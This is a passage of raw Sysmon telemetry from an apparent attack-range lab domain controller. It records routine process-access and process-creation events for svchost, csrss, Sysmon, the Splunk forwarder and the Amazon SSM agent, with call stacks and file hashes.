Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000002244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.960{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4800-00000000AE01}4076C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.958{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.958{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.958{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.955{266CAFBE-647D-6064-2D00-00000000AE01}23643376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5d95e 154100x80000000000000002232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.397{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe-----"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=532894851130E19A62E811A3C7E2B6A6,SHA256=950F8FCDD05F9DD8D1C9E4C9B6D7D18644F662683A1942BD70B1028FA595119C,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{266CAFBE-647D-6064-2D00-00000000AE01}2364C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000002231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.924{266CAFBE-647E-6064-4700-00000000AE01}40204024C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.908{266CAFBE-647E-6064-4400-00000000AE01}39443976C:\Windows\system32\wbem\wmiprvse.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\combase.dll+a8a02|C:\Windows\System32\combase.dll+a972e|C:\Windows\System32\combase.dll+a953f|C:\Windows\System32\combase.dll+45458|C:\Windows\System32\combase.dll+45070|C:\Windows\System32\combase.dll+520a7|C:\Windows\System32\combase.dll+c2274|C:\Windows\System32\combase.dll+4f0e1|C:\Windows\System32\combase.dll+508c0|C:\Windows\System32\combase.dll+21ba|C:\Windows\System32\RPCRT4.dll+d97da|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000002229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.893{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 